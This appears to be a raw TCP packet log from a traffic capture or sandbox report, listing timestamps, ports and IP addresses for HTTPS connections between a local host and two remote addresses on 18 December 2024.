                                                                                                                                                                                                                  Dec 18, 2024 21:06:09.889622927 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:09.889640093 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:09.931363106 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:09.931391001 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:09.931530952 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:09.931560040 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:09.931595087 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093389034 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093421936 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093580008 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093616009 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093635082 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093703985 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093705893 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093713999 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093729019 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093784094 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093801022 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093813896 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093821049 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093828917 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093830109 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093847036 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093873978 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093878984 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.093910933 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.098540068 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.108469009 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.108484983 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.108582973 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.108591080 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.109029055 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.138967991 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.139014959 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.139071941 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.139097929 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.139118910 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.139208078 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.139213085 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.146327019 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.146349907 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.146456957 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.146466017 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.146496058 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.175451994 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.175472021 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.175590992 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.175622940 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.175956964 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.214570999 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.214585066 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.234296083 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.234322071 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.234428883 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.234458923 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.234472036 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.235959053 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.242177963 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.242213964 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.242275953 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.242299080 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.242311954 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.242496967 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.256170988 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.256195068 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.256294966 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.256320953 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.256417990 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.262401104 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.262459993 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.262501955 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.262510061 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.262558937 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272597075 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272619963 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272706985 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272778988 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272818089 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272984982 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.282129049 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.282150984 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.282206059 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.282233000 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.282254934 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.282270908 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.287748098 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.287770033 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.287859917 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.287930965 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.287971020 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.288003922 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.299401999 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.299418926 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.299518108 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.299537897 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.299571037 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.304997921 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.305016994 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.305093050 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.305119991 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.305156946 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.320327997 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.320375919 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.320404053 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.320421934 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.320461035 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.320482016 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.324063063 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.324084044 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.324131966 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.324157953 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.324182987 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.324202061 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.337660074 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.337708950 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.337753057 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.337774038 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.337801933 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.337826967 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.339940071 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.339958906 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.340013981 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.340040922 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.340070963 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.340080976 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.354513884 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.354537010 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.354593992 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.354612112 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.354652882 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.354671955 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.358179092 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.358226061 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.358263016 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.358280897 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.358323097 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.358341932 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.371078014 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.371098995 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.371154070 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.371190071 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.371212006 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.371229887 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.386629105 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.386650085 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.386745930 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.386785030 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.386823893 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.396629095 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.396682024 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.396730900 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.396734953 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.396780968 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.429218054 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.429245949 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.429296970 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.429317951 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.429359913 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.429378033 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.441637039 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.441658020 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.441740036 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.441746950 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.441807032 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.454453945 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.454480886 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.454598904 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.454615116 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.454654932 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.466372013 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.466423035 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.466492891 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.466504097 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.466547966 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.466555119 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.474661112 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.474706888 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.474796057 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.474808931 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.474818945 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.474845886 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.481942892 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.481991053 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.482060909 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.482072115 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.482105017 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.482120991 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.489128113 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.489177942 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.489233971 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.489240885 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.489284992 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.496999979 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.497049093 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.497108936 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.497133970 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.497145891 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.497167110 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.620177031 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.620234966 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.620255947 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.620274067 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.620301962 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.620313883 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.628336906 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.628403902 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.628458023 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.628499031 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.628516912 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.628532887 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.635699987 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.635746956 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.635791063 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.635818005 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.635843992 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.635865927 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.643090963 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.643122911 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.643193960 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.643212080 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.643237114 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.643244982 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.644351006 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.644416094 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.644429922 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.644458055 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.644465923 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.644493103 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.711724997 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.903877974 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.903913975 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.903965950 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.904074907 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.904107094 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.904119015 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.904156923 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.904156923 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958008051 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958035946 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958054066 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958075047 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958100080 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958118916 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958137035 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958148956 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958148956 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958162069 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958178043 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.958211899 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.015331030 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102334023 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102387905 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102406025 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102408886 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102456093 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102494955 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102499962 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102499962 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102525949 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102566004 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.102627993 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.133565903 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.133591890 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.133631945 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.133671045 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.133693933 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.133693933 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.133723974 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.133830070 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.159548998 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.159600019 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.159653902 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.159672976 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.159714937 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.159714937 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.187171936 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.187244892 CET44349741147.45.49.155192.168.2.6
